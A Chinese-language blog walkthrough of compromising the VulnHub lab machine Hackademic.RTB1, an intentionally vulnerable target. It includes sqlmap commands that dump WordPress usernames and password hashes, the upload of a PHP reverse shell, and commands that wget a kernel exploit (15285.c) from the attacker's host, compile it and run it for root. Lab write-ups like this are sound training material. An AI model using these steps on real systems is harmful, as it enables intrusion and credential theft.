渗透测试靶机:vulnhub-Hackademic.RTB1

一、开始渗透

1.1 获取一下kali的IP网卡信息和靶机ip

ifconfig
arp-scan-l

title

1.2 扫描靶机端口和服务

  • 扫描开放端口

    nmap -p- 192.168.111.130

title

  • 确定端口服务和漏洞

    nmap -sV -sC 192.168.111.130

title

1.3 漏洞利用

1.3.1 先去访问一下80端口的网页,看看有些什么
title
提示需要获取root权限和root目录下的key.txt,然后还发现有几个链接可以点击,点一下
title
下面两个链接都试一下手动注入,发现第二个存在sql漏洞。
title
1.3.2 使用sqlmap工具

sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" --current-db --batch
sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump --batch

title
title
title
title
1.3.3 使用目录扫描

dirsearch -u "http://192.168.111.130/Hackademic_RTB1/"

发现有个wp-admin的子目录
title
1.3.4 寻找上传点
发现GeorgeMiller用户有配置选项,开启文件上传,启用后可以看到右边多了个"upload"
title
1.3.5 使用kali自带的php反弹shell
修改为kali的ip
title
上传文件后,开启监听,访问webshell
title
发现权限不够,想办法提权
1.3.6 内核提权
title
title
选定一个然后开启apache服务

title
然后回到原本监听着的webshell

cd /tmp
wget http://172.16.95.133/15285.c
gcc -o exp 15285.c
chmod +x exp
./exp

获取root下的key.txt
title

  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值